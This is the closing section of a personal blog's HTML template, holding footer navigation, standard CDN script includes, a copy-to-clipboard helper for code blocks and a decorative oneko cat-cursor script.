        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2026
    valiumaggelein
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Archive</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/tags/">Tags</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


    <script src="/js/oneko.js"></script>
    <script>
      window.onload = function() {
        oneko('/images/oneko.gif');
      };
    </script>
</body>
</html>
